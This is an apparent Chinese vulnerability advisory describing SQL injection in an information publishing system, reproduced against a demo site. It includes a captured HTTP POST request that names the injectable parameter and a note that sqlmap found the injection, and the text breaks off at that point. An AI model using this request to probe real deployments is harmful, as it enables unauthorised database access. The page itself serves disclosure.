某信息发布系统SQL注入(demo复现)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 某信息发布系统SQL注入(demo复现) ### 详细说明: 某信息发布系统SQL注入(demo复现) ### 漏洞证明: 注入在这个地方: [<img src="https://images.seebug.org/upload/201502/2815580956e2e4ed7bd5b1e209f9ade47d981fcd.jpg" alt="360截图20150228155750951.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/2815580956e2e4ed7bd5b1e209f9ade47d981fcd.jpg) 抓包看看: POST /index.php HTTP/1.1 Host: pmbdemo.youyax.com Proxy-Connection: keep-alive Content-Length: 21 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://pmbdemo.youyax.com User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://pmbdemo.youyax.com/index.php Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8 Cookie: PHPSESSID=e3036ed3248be3f189e336878c8e542f ck%5B%5D=2&sub_lists= 我们在sqlmap中看参数: sqlmap identified the following injection...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息